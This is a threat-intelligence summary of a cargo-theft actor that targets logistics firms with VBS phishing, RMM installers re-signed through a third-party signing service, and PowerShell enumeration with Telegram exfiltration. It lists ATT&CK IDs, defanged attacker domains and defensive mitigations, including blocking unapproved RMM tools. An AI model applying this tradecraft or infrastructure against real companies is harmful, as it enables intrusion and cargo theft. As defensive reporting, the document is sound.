Full Report
Cargo-stealing hackers have a new trick up their sleeve: using a third-party code-signing service makes their remote management and monitoring software installers
Analysis Summary
# Threat Actor: Unnamed (Freight/Cargo Theft Actor)
## Attribution & Identity
* **Identification:** A "prolific" but currently unnamed threat actor, likely a small group of individuals.
* **Associations:** Linked to organized crime groups for the physical distribution and reselling of stolen goods.
* **Status:** Active; recently observed in campaigns as of February 2024 through April 2026.
## Activity Summary
The actor specializes in the compromise of transportation and logistics firms to facilitate high-value cargo theft. A significant campaign began on February 27, 2026, involving phishing emails containing malicious Visual Basic Scripts (VBS). The actor utilizes a "post-compromise playbook" that includes deploying multiple Remote Management and Monitoring (RMM) tools and using a novel third-party code-signing service to bypass security detections.
## Tactics, Techniques & Procedures
* **Phishing:** Delivery of malicious VBS attachments masquerading as "broker-carrier agreements."
* **Code Signing Evasion:** Use of a third-party service (`signer[.]bulbcentral[.]com`) to re-sign RMM installers with valid, but fraudulent, certificates.
* **Hands-on-Keyboard Activity:** Manual execution of scripts and commands rather than fully automated payloads.
* **Discovery/Enumeration:** Use of 13+ PowerShell scripts to extract browsing history, local accounts, and search for specific financial/logistics URLs.
* **Data Exfiltration:** Sending stolen data to attacker-controlled bots via Telegram.
* **Persistence & Redundancy:** Installation of multiple different RMM clients on a single host.
* **MITRE ATT&CK IDs:**
* **T1566.001:** Phishing: Spearphishing Attachment
* **T1218.011:** System Binary Proxy Execution: Msiexec
* **T1553.002:** Subvert Trust Controls: Code Signing
* **T1219:** Remote Access Software
* **T1059.001:** Command and Scripting Interpreter: PowerShell
* **T1102:** Web Service (Telegram for exfiltration)
## Targeting
* **Sectors:** Transportation, Logistics, Freight Brokerage, and Fleet Services.
* **Geography:** Global (implied by the nature of international shipping and online reselling).
* **Victims:** Transport and logistics firms, specifically targeting carriers and brokers to intercept load bidding processes.
## Tools & Infrastructure
* **RMM Software:**
* ConnectWise ScreenConnect (multiple instances)
* SimpleHelp RMM
* Pulseway RMM
* **Malware/Scripts:** VBS downloaders, PowerShell enumeration/exfiltration scripts.
* **Infrastructure:**
* `amtechcomputers[.]net` (C2/Host for malicious MSI files)
* `signer[.]bulbcentral[.]com` (Third-party code-signing service)
* Telegram (Exfiltration channel)
## Implications
This actor represents a convergence of cybercrime and physical organized crime. By gaining access to logistics platforms, they can digitally "hijack" shipments by bidding on authentic loads and diverting them via fraudulent instructions. The use of a commercialized third-party code-signing service indicates a maturing ecosystem where specialized evasion tools are available to lower-tier actors to bypass endpoint protection.
## Mitigations
* **RMM Monitoring:** Implement strict application control policies to block unauthorized RMM tools (ScreenConnect, Pulseway, etc.) not explicitly approved by IT.
* **VBS/Script Blocking:** Disable or restrict the execution of Visual Basic Scripts and unassigned PowerShell scripts on end-user workstations.
* **Certificate Validation:** Monitor for unusual or newly issued code-signing certificates, particularly those associated with the `bulbcentral` infrastructure.
* **Industry-Specific Vigilance:** Conduct extra verification for broker-carrier agreements received via email, specifically looking for unexpected attachments.
* **EDR/Deception:** Deploy deception technology (honey-tokens/decoy AD environments) to catch hands-on-keyboard enumeration activities.